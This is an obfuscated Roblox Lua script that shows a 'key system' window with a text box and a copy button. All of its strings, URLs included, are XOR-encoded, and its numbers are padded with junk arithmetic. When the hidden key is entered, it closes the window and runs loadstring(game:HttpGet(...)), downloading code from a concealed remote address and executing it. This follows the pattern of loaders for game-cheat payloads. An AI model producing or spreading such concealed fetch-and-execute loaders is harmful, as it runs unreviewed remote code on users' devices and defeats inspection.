--[[
                ,----..           ,--.            
  ,----..      /   /   \      ,--/  /|     ,---,. 
 /   /   \    /   .     :  ,---,': / '   ,'  .' | 
|   :     :  .   /   ;.  \ :   : '/ /  ,---.'   | 
.   |  ;. / .   ;   /  ` ; |   '   ,   |   |   .' 
.   ; /--`  ;   |  ; \ ; | '   |  /    :   :  |-, 
;   | ;     |   :  | ; | ' |   ;  ;    :   |  ;/| 
|   : |     .   |  ' ' ' : :   '   \   |   :   .' 
.   | '___  '   ;  \; /  | |   |    '  |   |  |-, 
'   ; : .'|  \   \  ',  /  '   : |.  \ '   :  ;/| 
'   | '/  :   ;   :    /   |   | '_\.' |   |    \ 
|   :    /     \   \ .'    '   : |     |   :   .' 
 \   \ .'       `---`      ;   |,'     |   | ,'   
  `---`                    '---'       `----'     
                                                  


]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v69,v70) local v71={};for v80=1, #v69 do v6(v71,v0(v4(v1(v2(v69,v80,v80 + 1 )),v1(v2(v70,1 + (v80% #v70) ,1 + (v80% #v70) + 1 )))%256 ));end return v5(v71);end local v8=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\19\193\43\220\249\49\234\63\204","\156\67\173\74\165"));local v10=Instance.new(v7("\18\165\72\27\185","\38\84\215\41\118\220\70"));v10.Size=UDim2.new(1185 -(979 + 206) ,568 -248 ,0,199 + 1 );v10.Position=UDim2.new(791.5 -(368 + 423) , -(502 -342),0.5, -(118 -(10 + 8)));v10.BackgroundColor3=Color3.fromRGB(34,34,130 -96 );v10.BorderSizePixel=0;v10.Parent=v8;local v16=Instance.new(v7("\100\19\58\6\210\81\20\39\30","\158\48\118\66\114"));v16.Size=UDim2.new(443 -(416 + 26) ,0 -0 ,0 + 0 ,53 -23 );v16.Position=UDim2.new(438 -(145 + 293) ,0,430 -(44 + 386) , -30);v16.Text=v7("\133\45\23\49\118\183\187\137\43\9\118","\155\203\68\112\86\19\197")   .. game.Players.LocalPlayer.Name ;v16.TextColor3=Color3.fromRGB(1741 -(998 + 488) ,255,255);v16.BackgroundColor3=Color3.fromRGB(0 + 0 ,0 + 0 ,0);v16.Font=Enum.Font.GothamBold;v16.TextSize=792 -(201 + 571) ;v16.TextStrokeTransparency=1138.8 -(116 + 1022) ;v16.Parent=v10;local v27;local v28;local v29;local v30;local function v31(v72) local v73=v72.Position-v29 ;v10.Position=UDim2.new(v30.X.Scale,v30.X.Offset + v73.X ,v30.Y.Scale,v30.Y.Offset + v73.Y );end v16.InputBegan:Connect(function(v75) if ((v75.UserInputType==Enum.UserInputType.MouseButton1) or (v75.UserInputType==Enum.UserInputType.Touch)) then local v81=0 -0 ;while true do if ((0 + 0)==v81) then v27=true;v29=v75.Position;v81=1;end if (v81==(3 -2)) then v30=v10.Position;v75.Changed:Connect(function() if (v75.UserInputState==Enum.UserInputState.End) then v27=false;end end);break;end end end end);v16.InputChanged:Connect(function(v76) if ((v76.UserInputType==Enum.UserInputType.MouseMovement) or (v76.UserInputType==Enum.UserInputType.Touch)) then v28=v76;end end);v16.InputEnded:Connect(function(v77) if ((v77.UserInputType==Enum.UserInputType.MouseButton1) or (v77.UserInputType==Enum.UserInputType.Touch)) then local v82=0 -0 ;while true do if (v82==(859 -(814 + 45))) then v27=false;v28=nil;break;end end end end);game:GetService(v7("\115\206\51\238\105\118\245\237\82\238\51\238\86\113\230\253","\152\38\189\86\156\32\24\133")).InputChanged:Connect(function(v78) if ((v78==v28) and v27) then v31(v78);end end);local v32=Instance.new(v7("\200\82\191\82\222\88\191","\38\156\55\199"));v32.Size=UDim2.new(2 -1 , -(2 + 18),0.3 + 0 ,885 -(261 + 624) );v32.Position=UDim2.new(0 -0 ,10,1080 -(1020 + 60) ,1463 -(630 + 793) );v32.Text=v7("\141\115\104\45\1\52\238\75\173\61\87\45\10\52\245\81\232\126\112\33\16\127\186\76\166\61\123\45\7\52\241\70\177\61\126\61\7\96\245\77\232\105\115\104\16\123\234\90\232\118\121\49\83\120\243\77\163","\35\200\29\28\72\115\20\154");v32.TextColor3=Color3.fromRGB(0,0 -0 ,0 -0 );v32.BackgroundTransparency=0.3;v32.BackgroundColor3=Color3.fromRGB(255,255,101 + 154 );v32.TextSize=16;v32.Font=Enum.Font.Gotham;v32.TextWrapped=true;v32.Parent=v10;local v44=Instance.new(v7("\45\186\201\203\175\57\32\13\176\223","\84\121\223\177\191\237\76"));v44.Size=UDim2.new(0.45 -0 ,0,1747.2 -(760 + 987) ,1913 -(1789 + 124) );v44.Position=UDim2.new(0,776 -(745 + 21) ,0.6,0);v44.Text=v7("\136\67\203\173\51\68","\161\219\54\169\192\90\48\80");v44.TextColor3=Color3.fromRGB(88 + 167 ,701 -446 ,255);v44.BackgroundColor3=Color3.fromRGB(0 -0 ,2 + 126 ,0 + 0 );v44.Font=Enum.Font.GothamBold;v44.TextSize=18;v44.Parent=v10;local v53=Instance.new(v7("\125\71\24\49\107\87\20\49\70\76","\69\41\34\96"));v53.Size=UDim2.new(1055 -(87 + 968) ,88 -68 ,0 + 0 ,45 -25 );v53.Position=UDim2.new(1, -(1443 -(447 + 966)),0 -0 ,1817 -(1703 + 114) );v53.Text="X";v53.TextColor3=Color3.fromRGB(255,956 -(376 + 325) ,255);v53.BackgroundColor3=Color3.fromRGB(255,0 -0 ,0 -0 );v53.Parent=v10;v53.MouseButton1Click:Connect(function() v8:Destroy();end);local v60=Instance.new(v7("\136\198\207\30\32\62\168\215\216\4","\75\220\163\183\106\98"));v60.Size=UDim2.new(0.45 + 0 ,0,0.2,0 -0 );v60.Position=UDim2.new(14.55 -(9 + 5) ,0,0.6,376 -(85 + 291) );v60.Text=v7("\37\191\159\119\242\7\163","\185\98\218\235\87");v60.TextColor3=Color3.fromRGB(255,1520 -(243 + 1022) ,970 -715 );v60.BackgroundColor3=Color3.fromRGB(0 + 0 ,1180 -(1123 + 57) ,255);v60.Font=Enum.Font.GothamBold;v60.TextSize=15 + 3 ;v60.Parent=v10;v44.MouseButton1Click:Connect(function() local v79=v32.Text;if (v79==v7("\196\53\43\238\215\167\222\44\37\244\209","\202\171\92\71\134\190")) then local v83=0;while true do if ((254 -(163 + 91))==v83) then v8:Destroy();loadstring(game:HttpGet(v7("\33\213\56\152\58\155\99\199\48\206\57\198\62\201\37\133\57\196\62\198\49\216\54\199\40\205\56\141\59\201\57\138","\232\73\161\76")))();break;end end end end);v60.MouseButton1Click:Connect(function() setclipboard(v7("\179\205\86\77\13\225\150\13\77\31\168\205\71\95\23\181\151\65\82\19\244\203\67\74\81\152\242\110\83\13\238\218\22","\126\219\185\34\61"));end);
